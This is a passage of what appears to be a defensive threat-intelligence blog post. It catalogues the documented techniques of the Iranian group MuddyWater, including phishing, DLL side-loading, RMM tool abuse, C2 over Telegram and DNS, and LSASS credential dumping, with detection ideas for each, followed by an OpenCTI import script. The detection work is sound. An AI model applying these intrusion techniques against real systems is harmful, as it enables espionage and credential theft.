href="https://www.cisa.gov/sites/default/files/publications/AA22-055A_Iranian_Government-Sponsored_Actors_Conduct_Cyber_Operations.pdf">CISA / FBI / CNMF / NCSC-UK / NSA — AA22–055A PDF</a></li><li><a href="https://media.defense.gov/2022/Feb/24/2002944274/-1/-1/0/CSA_AA22-055A_Iranian_Government-Sponsored_Actors_Conduct_Cyber_Operations.PDF">U.S. Cyber Command / Defense media — AA22–055A PDF mirror</a></li><li><a href="https://www.ncsc.gov.uk/news/joint-advisory-observes-muddywater-actors-conducting-cyber-espionage">NCSC-UK — Joint advisory on MuddyWater actor</a></li><li><a href="https://www.iranwatch.org/sites/default/files/cybercom_muddywater_press_release.pdf">U.S. Cyber Command / Iran Watch mirror — Iranian intel cyber suite of malware PDF</a></li><li><a href="https://duo.com/decipher/us-cyber-command-discloses-muddywater-malware-samples">Decipher — US Cyber Command Discloses MuddyWater Malware Samples</a></li><li><a href="https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/">SentinelOne — Wading Through Muddy Waters</a></li><li><a href="https://unit42.paloaltonetworks.com/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/">Palo Alto Unit 42 — Muddying the Water: Targeted Attacks in the Middle East</a></li><li><a href="https://radar.certfa.com/en/insights/cluster/fe272810/">CERTFA Radar — MuddyWater Threat Actor Cluster</a></li><li><a href="https://radar.certfa.com/en/threats/view/d7c9c420/">CERTFA Radar — MuddyWater / Earth Vetala Intrusion</a></li><li><a href="https://www.group-ib.com/masked-actors/muddywater/">Group-IB — MuddyWater APT Group Profile</a></li></ol><p><strong>Israel-Focused MuddyWater Sources</strong></p><ol><li><a href="https://www.gov.il/en/pages/_muddywater">Israel National Cyber Directorate — MuddyWater page</a></li><li><a href="https://www.gov.il/BlobFolder/news/_muddywater/en/government%20threat%20actor.pdf">Israel National Cyber Directorate — MuddyWater / DarkBit PDF</a></li><li><a href="https://www.gov.il/BlobFolder/reports/maddy_water_2024/en/ALERT_CERT_IL_W_1858.pdf">Israel National Cyber Directorate — Technological Advancement and Evolution of MuddyWater in 2024 PDF</a></li><li><a href="https://www.gov.il/BlobFolder/reports/alert_1947/he/ALERT-CERT-IL-W-1947.pdf">Israel National Cyber Directorate — Overview of Recent Phishing PDF</a></li><li><a href="https://www.clearskysec.com/operation-quicksand/">ClearSky — Operation Quicksand: MuddyWater’s Offensive Attack Against Israeli Organizations</a></li><li><a href="https://www.clearskysec.com/wp-content/uploads/2020/10/Operation-Quicksand.pdf">ClearSky — Operation Quicksand PDF</a></li><li><a href="https://www.microsoft.com/en-us/security/blog/2023/04/07/mercury-and-dev-1084-destructive-attack-on-hybrid-environment/">Microsoft — MERCURY and DEV-1084: Destructive attack on hybrid environment</a></li><li><a href="https://www.microsoft.com/en-us/security/blog/2022/06/02/exposing-polonium-activity-and-infrastructure-targeting-israeli-organizations/">Microsoft — Exposing POLONIUM activity and infrastructure targeting Israeli organizations</a></li><li><a href="https://www.proofpoint.com/us/blog/threat-insight/security-brief-ta450-uses-embedded-links-pdf-attachments-latest-campaign">Proofpoint — TA450 Uses Embedded Links in PDF Attachments in Latest Campaign</a></li><li><a href="https://harfanglab.io/insidethelab/muddywater-rmm-campaign/">HarfangLab — MuddyWater campaign abusing Atera Agents</a></li><li><a href="https://www.deepinstinct.com/blog/darkbeatc2-the-latest-muddywater-attack-framework">Deep Instinct — DarkBeatC2: The Latest MuddyWater Attack Framework</a></li><li><a href="https://www.scworld.com/brief/novel-c2-tool-leveraged-in-latest-muddywater-attacks">SC Media — Novel C2 tool leveraged in latest MuddyWater attacks</a></li><li><a href="https://blog.checkpoint.com/research/muddywater-threat-group-deploys-new-bugsleep-backdoor/">Check Point — MuddyWater Threat Group Deploys New BugSleep Backdoor</a></li><li><a href="https://www.welivesecurity.com/en/eset-research/muddywater-snakes-riverbank/">ESET / WeLiveSecurity — MuddyWater: Snakes by the riverbank</a></li><li><a href="https://www.eset.com/uk/about/newsroom/press-releases/iran-muddywater-critical-infrastructure-israel-egypt-snake-game-eset-research-uk/">ESET press release — Iran’s MuddyWater targets critical infrastructure in Israel and Egypt</a></li><li><a href="https://securityaffairs.com/185244/apt/muddywater-strikes-israel-with-advanced-muddyviper-malware.html">Security Affairs — MuddyWater strikes Israel with advanced MuddyViper malware</a></li><li><a href="https://thehackernews.com/2024/03/iran-linked-muddywater-deploys-atera.html">The Hacker News — Iran-Linked MuddyWater Deploys Atera for Surveillance in Phishing Attacks</a></li></ol><p><strong>Recent / Evolving MuddyWater Activity</strong></p><ol><li><a href="https://www.proofpoint.com/us/blog/threat-insight/around-world-90-days-state-sponsored-actors-try-clickfix">Proofpoint — Around the World in 90 Days: State-Sponsored Actors Try ClickFix</a></li><li><a href="https://www.proofpoint.com/us/blog/threat-insight/crossed-wires-case-study-iranian-espionage-and-attribution">Proofpoint — Crossed Wires: a case study of Iranian espionage and attribution</a></li><li><a href="https://www.group-ib.com/blog/muddywater-operation-olalampo/">Group-IB — Operation Olalampo: Inside MuddyWater’s Latest Campaign</a></li><li><a href="https://thehackernews.com/2026/02/muddywater-targets-mena-organizations.html">The Hacker News — MuddyWater Targets MENA Organizations with GhostFetch, CHAR, and HTTP_VIP</a></li><li><a href="https://www.rapid7.com/blog/post/tr-muddying-tracks-state-sponsored-shadow-behind-chaos-ransomware/">Rapid7 — Muddying the Tracks: The State-Sponsored Shadow Behind Chaos Ransomware</a></li><li><a href="https://thehackernews.com/2026/05/muddywater-uses-microsoft-teams-to.html">The Hacker News — MuddyWater Uses Microsoft Teams to Steal Credentials in False Flag Ransomware Attack</a></li><li><a href="https://www.rapid7.com/research/iran-conflict-cyber-threats/">Rapid7 — Iran Conflict Cyber Threat Intelligence</a></li><li><a href="https://www.extrahop.com/blog/the-digital-front-of-iranian-cyber-offensive-and-defensive-response">ExtraHop — The Digital Front of Iranian Cyber Offensive and Defensive Response</a></li><li><a href="https://abnormal.ai/blog/iran-aligned-cyber-operations-email-threats">Abnormal Security — Tracking Iran-Aligned Cyber Operations Following U.S.-Israel Strikes</a></li><li><a href="https://unit42.paloaltonetworks.com/boggy-serpens-threat-assessment/">Unit 42 — Boggy Serpens Threat Assessment</a></li><li><a href="https://hivepro.com/threat-advisory/muddywater-irans-adaptive-cyber-espionage-machine/">Hive Pro — MuddyWater: Iran’s Adaptive Cyber Espionage Machine</a></li><li><a href="https://hivepro.com/wp-content/uploads/2026/03/TA2026082.pdf">Hive Pro — MuddyWater / Operation Olalampo PDF</a></li><li><a href="https://ics-cert.kaspersky.com/wp-content/uploads/2024/10/kaspersky-ics-cert-apt-and-financial-attacks-on-industrial-organizations-in-q2-2024-en.pdf">Kaspersky ICS CERT — APT and financial attacks on industrial organizations in Q2 2024 PDF</a></li><li><a href="https://ics-cert.kaspersky.com/wp-content/uploads/2025/09/kaspersky-ics-cert-apt-and-financial-attacks-on-industrial-organizations-in-q2-2025-en-2.pdf">Kaspersky ICS CERT — APT and financial attacks on industrial organizations in Q2 2025 PDF</a></li><li><a href="https://documents.trendmicro.com/assets/pdf/Annual_APT_Report_2025.pdf">Trend Micro — Annual APT Report 2025 PDF</a></li><li><a href="https://go.intel471.com/hubfs/Emerging%20Threats/2025%20Emerging%20Threats/Upd%20HUNTER%20-%20Iranian%20Threat%20Actor%20Coverage.pdf">Intel 471 — HUNTER Iranian Threat Actor Coverage PDF</a></li></ol><p><strong>Iran Threat Context and Comparison Actors</strong></p><ol><li><a href="https://www.cisa.gov/topics/cyber-threats-and-advisories/advanced-persistent-threats/iran">CISA — Iran Threat Overview and Advisories</a></li><li><a href="https://www.cisa.gov/topics/cyber-threats-and-advisories/nation-state-cyber-actors/iran/publications">CISA — Iran state-sponsored cyber threat publications</a></li><li><a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-335a">CISA — AA23–335A: IRGC-Affiliated Cyber Actors Exploit PLCs in Multiple Sectors</a></li><li><a href="https://www.cisa.gov/sites/default/files/2023-12/aa23-335a-irgc-affiliated-cyber-actors-exploit-plcs-in-multiple-sectors-1.pdf">CISA — AA23–335A PDF</a></li><li><a href="https://attack.mitre.org/groups/G0049/">MITRE ATT&amp;CK — APT34</a></li><li><a href="https://attack.mitre.org/groups/G0059/">MITRE ATT&amp;CK — APT35 / Charming Kitten</a></li><li><a href="https://attack.mitre.org/groups/G1030/">MITRE ATT&amp;CK — Agrius</a></li><li><a href="https://www.microsoft.com/en-us/security/security-insider/mint-sandstorm">Microsoft — Mint Sandstorm</a></li><li><a href="https://www.microsoft.com/en-us/security/blog/2024/08/28/peach-sandstorm-deploys-new-custom-tickler-malware-in-long-running-intelligence-gathering-operations/">Microsoft — Peach Sandstorm deploys new custom Tickler malware</a></li><li><a href="https://learn.microsoft.com/en-us/microsoft-365/security/defender/microsoft-threat-actor-naming?view=o365-worldwide">Microsoft Learn — How Microsoft names threat actors</a></li><li><a href="https://www.sentinelone.com/blog/sentinelone-intelligence-brief-iranian-cyber-activity-outlook/">SentinelOne — Iranian Cyber Activity Outlook</a></li><li><a href="https://mirror.gpmidi.net/vx-underground/Malware%20Analysis/2024/2024-09-19%20-%20The%20Iranian%20Cyber%20Capability/Paper/2024-09-19%20-%20The%20Iranian%20Cyber%20Capability.pdf">Trellix — The Iranian Cyber Capability PDF</a></li></ol><p><strong>OpenCTI / STIX / Knowledge Graph References</strong></p><ol><li><a href="https://docs.opencti.io/latest/usage/data-model/">OpenCTI documentation — Data model</a></li><li><a href="https://docs.opencti.io/latest/reference/api/">OpenCTI documentation — GraphQL API</a></li><li><a href="https://docs.opencti.io/latest/usage/deduplication/">OpenCTI documentation — Deduplication</a></li><li><a href="https://docs.oasis-open.org/cti/stix/v2.1/stix-v2.1.html">OASIS — STIX 2.1 HTML specification</a></li><li><a href="https://docs.oasis-open.org/cti/stix/v2.1/cs02/stix-v2.1-cs02.pdf">OASIS — STIX 2.1 PDF specification</a></li><li><a href="https://stixproject.github.io/documentation/concepts/relationships/">STIX Project — Relationships</a></li><li><a href="https://arxiv.org/abs/2303.09999">STIXnet — Extracting STIX Objects in CTI Reports</a></li><li><a href="https://arxiv.org/abs/2507.16576">From Text to Actionable Intelligence: Automating STIX Entity and Relationship Extraction</a></li><li><a href="https://arxiv.org/abs/2605.15904">Context-aware Entity-Relation Extraction for Threat Intelligence Knowledge Graphs</a></li></ol><p><strong>Validate Before Promoting</strong></p><ol><li><a href="https://brandefense.io/wp-content/uploads/2025/10/brandefense.io-muddywater-iran-linked-espionage-group-expanding-global-reach-muddywater-.pdf">Brandefense — MuddyWater PDF</a></li><li><a href="https://assets.kpmg.com/content/dam/kpmgsites/in/pdf/2022/07/KPMG_CTI_Report_muddy.pdf.coredownload.inline.pdf">KPMG — CTI Report MuddyWater PDF</a></li></ol><p><strong>Critical discipline:</strong> AI output was used only for source discovery. Every claim, mapping, and detection record required analyst review before entering the dataset.</p><h3>Phase 2: Procedure Dataset</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Ji8MQqr4SpW620AV3QN67A.png"></figure><p>A procedure record is not an ATT&amp;CK technique. ATT&amp;CK describes what a class of actors <em>can</em> do. A procedure record describes what <em>this actor</em> did, in <em>this campaign</em>, as documented by <em>this source</em>, with a specific evidence label attached.</p><p>The distinction matters for detection. “Adversaries use scheduled tasks (T1053.005)” does not help you tune a detection rule. “BugSleep creates a scheduled task with a 43-minute repeat interval (INCD 2024, Observed)” does — because you now have a concrete interval to hunt for, a specific tool name, and a source you can cite in your detection rationale.</p><p>Each of the 10 records in <a href="https://github.com/anpa1200/operation-desert-hydra/blob/main/data/procedures.yaml">data/procedures.yaml</a> captures four things:</p><ul><li>The specific behavior — not the technique category</li><li>The source references that support it, with evidence labels</li><li>Candidate ATT&amp;CK technique mappings and the reasoning behind each candidate</li><li>Required telemetry, a detection idea, validation plan, and known limitations</li></ul><h4>Confidence Labels</h4><p>Each record carries one of four evidence labels inherited from the source assessment:</p><p><strong>Observed</strong> — the behavior appears directly in source telemetry, a recovered sample, a screenshot, or a government incident report with direct visibility into the event. This is the strongest label and the only one that justifies a high-priority detection without further corroboration.</p><p><strong>Reported</strong> — a source states the behavior occurred, but the evidence is assertion-level rather than artifact-level. Still usable; requires corroboration before relying on it alone.</p><p><strong>Assessed</strong> — the source draws an analytical conclusion based on multiple indicators. Appropriate for ATT&amp;CK candidate mappings; not sufficient alone for a new detection claim.</p><p><strong>Inferred</strong> — analyst conclusion derived from combining multiple reported facts across sources. Weakest label; flag for review before using in production.</p><p>All 10 procedures in this dataset carry <strong>Observed</strong> or <strong>High</strong> confidence. That is not a coincidence — it reflects the promotion threshold. Procedures that came only from secondary or inferred sources were not promoted into data/procedures.yaml; they stayed in the claim extraction notes for future work.</p><h4>The 10 Procedures</h4><p><strong>proc_mw_0001 — Spearphishing Email Delivery</strong> <em>Confidence: Observed · Sources: AA22–055A, INCD 2023, INCD 2024 · ATT&amp;CK: T1566.001, T1566.002, T1534</em></p><p>Three delivery variants documented across all three primary government sources: ZIP attachments containing macro-enabled Excel files or PDFs; email links to Egnyte or OneDrive delivering compressed RMM installers; and emails sent from compromised legitimate accounts to increase lure credibility. In 2024, a Microsoft-update-lure campaign sent to 10,000+ accounts embedded a PowerShell API key, granting the actor direct agent access immediately after the RMM tool installed. Three independent government sources corroborate this procedure — it is the highest-confidence initial access vector in the dataset.</p><p><strong>proc_mw_0002 — Public-Facing Exploitation</strong> <em>Confidence: Observed · Sources: AA22–055A, INCD 2023, INCD 2024 · ATT&amp;CK: T1190</em></p><p>Secondary initial access vector to phishing. Documented CVEs: CVE-2020–1472 (Netlogon/Zerologon), CVE-2020–0688 (Exchange), CVE-2021–44228 (Log4j), and unspecified VPN vulnerabilities confirmed by INCD 2024. Exploitation is typically followed by RMM tool deployment or custom backdoor staging. The VPN claim from INCD 2024 does not name a specific CVE — treat as Reported until a CVE is attributed.</p><p><strong>proc_mw_0003 — PowerShell Execution and Script Obfuscation</strong> <em>Confidence: Observed · Sources: AA22–055A, INCD 2024 · ATT&amp;CK: T1059.001, T1027</em></p><p>Cross-cutting technique present in every tool tier. PowGoop uses an obfuscated .dat + config.txt PowerShell chain for C2 beaconing. POWERSTATS is a persistent PowerShell backdoor. The 2024 lure embedded an API key executed via PowerShell to grant direct agent access. Obfuscation is applied consistently via Base64, XOR, and custom encoding. Detection anchor: Script Block Logging (EID 4104) is the primary telemetry dependency — without it, this procedure is nearly invisible to endpoint-only detection.</p><p><strong>proc_mw_0004 — DLL Side-Loading</strong> <em>Confidence: Observed · Sources: AA22–055A, INCD 2024 · ATT&amp;CK: T1574.002</em></p><p>PowGoop’s canonical execution method: a malicious DLL renamed Goopdate.dll placed alongside GoogleUpdate.exe, causing the legitimate signed binary to load and execute the malicious DLL. INCD 2024 confirms continued use across the 2024 toolset. Detection requires Sysmon EID 7 (image load) with signing status — not available from Windows Event Log alone. This is the most telemetry-constrained procedure in the dataset; validation was PARTIAL because the lab's stub DLL did not produce sufficient EID 7 signal.</p><p><strong>proc_mw_0005 — Registry Run Key and Startup Folder Persistence</strong> <em>Confidence: Observed · Sources: AA22–055A, INCD 2024 · ATT&amp;CK: T1547.001</em></p><p>Small Sieve adds index.exe under the Run key named OutlookMicrosift — mimicking a Microsoft application name. Canopy installs its first WSF script in the startup folder. AA22-055A documents an additional key: SystemTextEncoding. INCD 2024 confirms continued use. The specific key names (OutlookMicrosift, SystemTextEncoding) are high-confidence IoCs when present; a detection based only on "new Run key written by a non-installer" will generate noise in most enterprise environments.</p><p><strong>proc_mw_0006 — Scheduled Task (43-Minute Beacon)</strong> <em>Confidence: Observed · Source: INCD 2024 (single source) · ATT&amp;CK: T1053.005</em></p><p>BugSleep creates a Windows scheduled task triggered every 43 minutes for C2 beaconing. The interval is documented as customizable, but 43 minutes is the specific value observed in the INCD 2024 analysis. This is a single-source procedure — INCD 2024 only — which is why it carries a coverage score of 4 (correlated analytic) rather than 5 in the detection atlas. Before treating this interval as a high-confidence fingerprint in production, corroborate with a vendor source.</p><p><strong>proc_mw_0007 — RMM Tool Abuse</strong> <em>Confidence: Observed · Sources: AA22–055A, INCD 2023, INCD 2024, multiple vendor sources · ATT&amp;CK: T1219</em></p><p>The most consistently documented technique across all source tiers — five independent government and vendor sources corroborate it. Tool inventory across campaigns: ScreenConnect (2022), SyncroRAT (Israel 2023), rport.exe (DarkBit operation), AteraAgent (multiple vendor sources), SimpleHelp, Level, PDQConnect (2024). The 2024 lure embedded an API key so the actor had direct agent access the moment the victim installed the tool. Detection must rely on delivery context and parent process — not binary name alone, since these are legitimate commercial tools.</p><p><strong>proc_mw_0008 — C2 via Web Protocols and DNS Tunneling</strong> <em>Confidence: Observed · Sources: AA22–055A, INCD 2024 · ATT&amp;CK: T1071.001, T1572, T1102</em></p><p>Multiple C2 channels documented. Small Sieve beacons via Telegram Bot API over HTTPS. Canopy sends collected data via HTTP POST. Blackout uses GET /questions and POST /about-us. AnchorRAT communicates over HTTPS port 443 in JSON format. Mori uses DNS tunneling. In 2024, Rentry.co was used as a legitimate platform for C2 redirection. The Telegram API is the highest-confidence detection anchor: outbound HTTPS to api.telegram.org from a non-browser process is unusual in enterprise environments and directly attributed across multiple sources.</p><p><strong>proc_mw_0009 — WMI System Discovery Survey</strong> <em>Confidence: Observed · Source: AA22–055A (script documented verbatim) · ATT&amp;CK: T1047, T1082, T1016, T1033, T1518.001</em></p><p>MuddyWater runs a PowerShell script that queries WMI to collect: IP addresses (Win32_NetworkAdapterConfiguration), OS name and architecture (Win32_OperatingSystem), hostname, domain, username, and AV product names (root\SecurityCenter2\AntiVirusProduct). The collected data is assembled into a delimited string, encoded, and sent to C2. The exact script is reproduced in the CISA advisory. The SecurityCenter2 query is the detection anchor: legitimate enterprise software rarely queries this WMI namespace outside AV management contexts, making it a low-noise signal.</p><p><strong>proc_mw_0010 — Credential Dumping from LSASS and Credential Stores</strong> <em>Confidence: Observed · Source: AA22–055A · ATT&amp;CK: T1003.001, T1003.004, T1003.005</em></p><p>Post-access credential access using three tools: Mimikatz and procdump64.exe against LSASS memory (T1003.001); LaZagne for LSA secrets (T1003.004) and cached domain credentials (T1003.005). Used post-exploitation to enable lateral movement with harvested credentials. Detection via Sysmon EID 10 (process accessing lsass.exe) is tool-agnostic — it fires regardless of whether the actor uses Mimikatz, procdump, or a custom variant with a different binary name. This is the most reliable detection path for this procedure.</p><h3>Phase 3: OpenCTI Knowledge Graph</h3><p>The procedure dataset and source register go into a self-hosted OpenCTI 6.2 instance. This creates the analytical record — queryable, relationship-aware, ATT&amp;CK-linked.</p><h3>OpenCTI Deployment</h3><p>The stack used in this project is documented and publicly reproducible. The full deployment — Docker Compose, connectors, and an AI enrichment connector that calls Claude via the Anthropic API — lives in a dedicated project:</p><ul><li><strong>GitHub:</strong> <a href="https://github.com/anpa1200/opencti-intelligent-shield">github.com/anpa1200/opencti-intelligent-shield</a></li></ul><p><a href="https://github.com/anpa1200/opencti-intelligent-shield">GitHub - anpa1200/opencti-intelligent-shield: OpenCTI AI-driven threat intelligence enrichment with Claude and Docusaurus documentation</a></p><ul><li><strong>Medium guide:</strong></li></ul><p><a href="https://medium.com/@1200km/the-intelligent-shield-057c9b4b9394">The Intelligent Shield. OpenCTI</a></p><ul><li><strong>Main guide:</strong> <a href="https://anpa1200.github.io/opencti-intelligent-shield/">anpa1200.github.io/opencti-intelligent-shield</a></li></ul><p><a href="https://anpa1200.github.io/opencti-intelligent-shield">OpenCTI AI Enrichment | The Intelligent Shield</a></p><p>The Intelligent Shield project covers: OpenCTI core stack (Redis, Elasticsearch, MinIO, RabbitMQ, platform, workers), MITRE ATT&amp;CK connector, and a custom internal enrichment connector that uses Claude to automatically summarize and enrich threat objects. Docker Compose files, a sanitized .env.example, and full setup instructions are all version-controlled.</p><p>To spin up the stack standalone (outside Operation Desert Hydra):</p><pre>git clone https://github.com/anpa1200/opencti-intelligent-shield.git openCTI<br>cd openCTI<br>cp .env.example .env<br># fill in tokens and passwords<br>./scripts/start-all.sh   # OpenCTI at :8080<br>./scripts/stop-all.sh    # halt, preserves volumes</pre><p>In the context of Operation Desert Hydra the stack is embedded in stack/ and started with bash start.sh — no separate clone needed. The Intelligent Shield project is the standalone reference deployment for anyone who wants OpenCTI without the lab.</p><h4>Step 10: Stack Start</h4><pre>bash start.sh --skip-lab   # starts OpenCTI + Elasticsearch + Kibana only</pre><p>All 12 core containers start: Redis, Elasticsearch, MinIO, RabbitMQ, OpenCTI platform, 3 workers, and the MITRE ATT&amp;CK connector.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*_8pjCgFqyge4o-bahQTX6Q.png"></figure><p><strong>Result:</strong> OpenCTI reachable at http://localhost:8080. All containers healthy.</p><h4>Step 11: MITRE ATT&amp;CK Connector Sync</h4><p>The MITRE ATT&amp;CK connector loads 846 techniques into the graph. This sync must complete before the import script can link procedures to techniques.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*k4o9xri96voJcB0EUQPqfg.png"></figure><p><strong>Result:</strong> 846 ATT&amp;CK patterns loaded. Connector state: ACTIVE.</p><h4>Step 12: Import Script</h4><p>Script: <a href="https://github.com/anpa1200/operation-desert-hydra/blob/main/tools/opencti_import.py"><strong>tools/opencti_import.py</strong></a></p><pre>export OPENCTI_URL=http://localhost:8080<br>export OPENCTI_TOKEN=&lt;admin token from stack/.env&gt;<br>python3 tools/opencti_import.py</pre><p>The script reads data/sources.yaml and data/procedures.yaml — it does not hardcode any intelligence. The YAML files are the single source of truth; the script is just a translation layer from those files into OpenCTI's API.</p><p><strong>What it creates and why:</strong></p><p><strong>Step 1 — Iran MOIS (Identity: Organization).</strong> Every object in OpenCTI needs a createdBy reference. Creating the sponsoring organization first gives all downstream objects a consistent authoring context and makes the attribution relationship explicit in the graph: MuddyWater → attributed-to → Iran MOIS.</p><p><strong>Step 2 — MuddyWater (Intrusion Set).</strong> The intrusion set object carries all known aliases: Seedworm, Mango Sandstorm, TA450, Static Kitten, TEMP.Zagros, Mercury, DEV-1084. Aliases matter for deduplication — OpenCTI uses them to avoid creating duplicate entities when the same actor appears under different names in different reports.</p><p><strong>Step 3 — Malware catalog (9 objects).</strong> Each actor-developed tool gets a Malware object with a description derived from source reporting. The catalog: POWERSTATS, PowGoop, Small Sieve, Canopy, Mori, BugSleep, AnchorRAT, SyncroRAT, DarkBit.</p><p><strong>Step 4 — Tool catalog (4 objects).</strong> Legitimate tools abused by the actor are STIX Tool objects, not Malware — the distinction matters for downstream analysis. The catalog: AteraAgent, SimpleHelp, Mimikatz, LaZagne.</p><p><strong>Step 5 — uses relationships.</strong> MuddyWater → uses → each malware and tool object. These relationships make the graph queryable: “which tools does this actor use?” returns all 13 objects in one hop.</p><p><strong>Step 6 — Reports from sources.yaml.</strong> One Report object per promoted source, with publisher, reliability rating, credibility score, actor claims, key entities, and ATT&amp;CK candidates written into the description. MuddyWater is added as an object reference so each report is queryable from the actor page.</p><p><strong>Step 7 — ATT&amp;CK pattern links from procedures.yaml.</strong> Iterates all attck_candidates across the 10 procedure records and creates MuddyWater → uses → ATT&amp;CK technique relationships. If the MITRE connector has not yet synced a technique, the script creates a stub Attack Pattern object (with x_mitre_id set) and flags it for enrichment. This prevents the import from failing on a timing issue between the connector sync and the import run.</p><p>The script is <strong>idempotent</strong>: every object lookup uses a read() before create(). Re-running after a partial failure or after the MITRE connector syncs simply confirms existing objects and fills in any gaps.</p><pre>#!/usr/bin/env python3<br>"""<br>Desert Hydra — Phase 3 OpenCTI graph import.Reads data/sources.yaml and data/procedures.yaml and creates:<br>  - Identity:       Iran MOIS (organization)<br>  - Intrusion Set:  MuddyWater (with all known aliases)<br>  - Malware:        actor-developed tools (9 objects)<br>  - Tool:           legitimate tools abused (4 objects)<br>  - Reports:        one per promoted source (up to 20)<br>  - Relationships:  attributed-to, uses (malware/tool/ATT&amp;CK)<br>Idempotent - existing objects are not duplicated.<br>ATT&amp;CK pattern links are skipped for techniques not yet synced by the<br>MITRE connector; re-run the script after the MITRE sync completes.<br>Usage:<br>    export OPENCTI_URL=http://localhost:8080<br>    export OPENCTI_TOKEN=&lt;admin-token&gt;<br>    python3 tools/opencti_import.py<br>"""<br>import os<br>import sys<br>import yaml<br>from pathlib import Path<br>from pycti import OpenCTIApiClient<br>from pycti.entities.opencti_identity import IdentityTypes<br># ── Bootstrap ─────────────────────────────────────────────────────────────────<br>OPENCTI_URL   = os.environ.get("OPENCTI_URL",   "http://localhost:8080")<br>OPENCTI_TOKEN = os.environ.get("OPENCTI_TOKEN", "")<br>REPO_ROOT     = Path(__file__).resolve().parent.parent<br>if not OPENCTI_TOKEN:<br>    sys.exit("ERROR: set OPENCTI_TOKEN environment variable")<br>api = OpenCTIApiClient(url=OPENCTI_URL, token=OPENCTI_TOKEN, log_level="error")<br>print(f"[desert-hydra] Connected  {OPENCTI_URL}")<br># ── Load YAML data ─────────────────────────────────────────────────────────────<br>with open(REPO_ROOT / "data" / "sources.yaml") as f:<br>    SOURCES = yaml.safe_load(f)["sources"]<br>with open(REPO_ROOT / "data" / "procedures.yaml") as f:<br>    PROCEDURES = yaml.safe_load(f)["procedures"]<br>print(f"[desert-hydra] Loaded {len(SOURCES)} sources, {len(PROCEDURES)} procedures")<br># ── TLP:WHITE ─────────────────────────────────────────────────────────────────<br>def get_tlp_white():<br>    results = api.marking_definition.list(<br>        filters={<br>            "mode": "and",<br>            "filters": [{"key": "definition", "values": ["TLP:WHITE"]}],<br>            "filterGroups": [],<br>        }<br>    )<br>    if results:<br>        return results[0]["id"]<br>    obj = api.marking_definition.create(<br>        definition_type="TLP",<br>        definition="TLP:WHITE",<br>        x_opencti_color="#ffffff",<br>        x_opencti_order=0,<br>    )<br>    return obj["id"]<br>TLP_WHITE = get_tlp_white()<br># ── Helpers ───────────────────────────────────────────────────────────────────<br>def _find(accessor, name):<br>    """Look up a STIX object by name. Returns the object dict or None."""<br>    return accessor.read(<br>        filters={<br>            "mode": "and",<br>            "filters": [{"key": "name", "values": [name]}],<br>            "filterGroups": [],<br>        }<br>    )<br><br>def link(from_id, to_id, rel_type, confidence=80):<br>    """Create a STIX core relationship; silently skip if it already exists."""<br>    try:<br>        api.stix_core_relationship.create(<br>            fromId=from_id,<br>            toId=to_id,<br>            relationship_type=rel_type,<br>            confidence=confidence,<br>            objectMarking=[TLP_WHITE],<br>        )<br>    except Exception:<br>        pass<br><br>ATTCK_NAMES = {<br>    "T1574.002": "DLL Side-Loading",<br>    "T1574.001": "DLL Search Order Hijacking",<br>    "T1546.015": "Component Object Model Hijacking",<br>    "T1218.010": "Regsvr32",<br>}<br>def find_or_create_attack_pattern(mitre_id):<br>    """Look up an ATT&amp;CK pattern by x_mitre_id. Create stub if not synced yet."""<br>    result = api.attack_pattern.read(<br>        filters={<br>            "mode": "and",<br>            "filters": [{"key": "x_mitre_id", "values": [mitre_id]}],<br>            "filterGroups": [],<br>        }<br>    )<br>    if result:<br>        return result["id"], False<br>    name = ATTCK_NAMES.get(mitre_id, mitre_id)<br>    obj = api.attack_pattern.create(<br>        name=name,<br>        x_mitre_id=mitre_id,<br>        description=f"MITRE ATT&amp;CK technique {mitre_id}. Created as stub pending MITRE connector sync.",<br>        objectMarking=[TLP_WHITE],<br>        confidence=75,<br>    )<br>    return obj["id"], True<br># ── Step 1: Iran MOIS Identity ────────────────────────────────────────────────<br>existing = _find(api.identity, "Iran MOIS")<br>if existing:<br>    MOIS_ID = existing["id"]<br>else:<br>    obj = api.identity.create(<br>        type=IdentityTypes.ORGANIZATION.value,<br>        name="Iran MOIS",<br>        description=(<br>            "Iranian Ministry of Intelligence and Security (MOIS). "<br>            "State sponsor attributed to MuddyWater cyber operations by CISA, FBI, "<br>            "CNMF, NCSC-UK, and NSA in joint advisory AA22-055A (February 2022)."<br>        ),<br>        objectMarking=[TLP_WHITE],<br>        confidence=85,<br>    )<br>    MOIS_ID = obj["id"]<br># ── Step 2: MuddyWater Intrusion Set ──────────────────────────────────────────<br>existing = _find(api.intrusion_set, "MuddyWater")<br>if existing:<br>    MW_ID = existing["id"]<br>else:<br>    obj = api.intrusion_set.create(<br>        name="MuddyWater",<br>        aliases=[<br>            "Seedworm", "Mango Sandstorm", "TA450",<br>            "Static Kitten", "TEMP.Zagros", "Mercury", "DEV-1084",<br>        ],<br>        description=(<br>            "Iranian MOIS subordinate threat group active since at least 2017. "<br>            "Targets government, defense, telecom, oil and gas, and MSPs globally. "<br>            "Significant focus on Israeli organizations since 2022. Known for "<br>            "spearphishing, RMM tool abuse, and a shift toward in-house tooling "<br>            "(BugSleep, AnchorRAT) beginning ~May 2024."<br>        ),<br>        resource_level="government",<br>        primary_motivation="espionage",<br>        confidence=85,<br>        objectMarking=[TLP_WHITE],<br>        createdBy=MOIS_ID,<br>    )<br>    MW_ID = obj["id"]<br>link(MW_ID, MOIS_ID, "attributed-to", 85)<br># ── Step 3: Malware catalog ────────────────────────────────────────────────────<br>MALWARE_CATALOG = [<br>    {"name": "POWERSTATS",  "aliases": ["Powermud"],   "description": "MuddyWater first-stage PowerShell backdoor (MITRE S0223)."},<br>    {"name": "PowGoop",     "aliases": ["Goopdate"],   "description": "DLL loader hijacking GoogleUpdate.exe via side-loading (MITRE S1046)."},<br>    {"name": "Small Sieve", "aliases": [],             "description": "Python backdoor compiled as NSIS; Telegram Bot API C2; OutlookMicrosift Run key."},<br>    {"name": "Canopy",      "aliases": ["Starwhale"],  "description": "Excel-macro dropper; startup folder persistence; HTTP POST C2."},<br>    {"name": "Mori",        "aliases": [],             "description": "DNS-tunneling backdoor deployed as FML.dll via regsvr32.exe."},<br>    {"name": "BugSleep",    "aliases": [],             "description": "In-house backdoor (2024); 43-minute scheduled task; shellcode injection."},<br>    {"name": 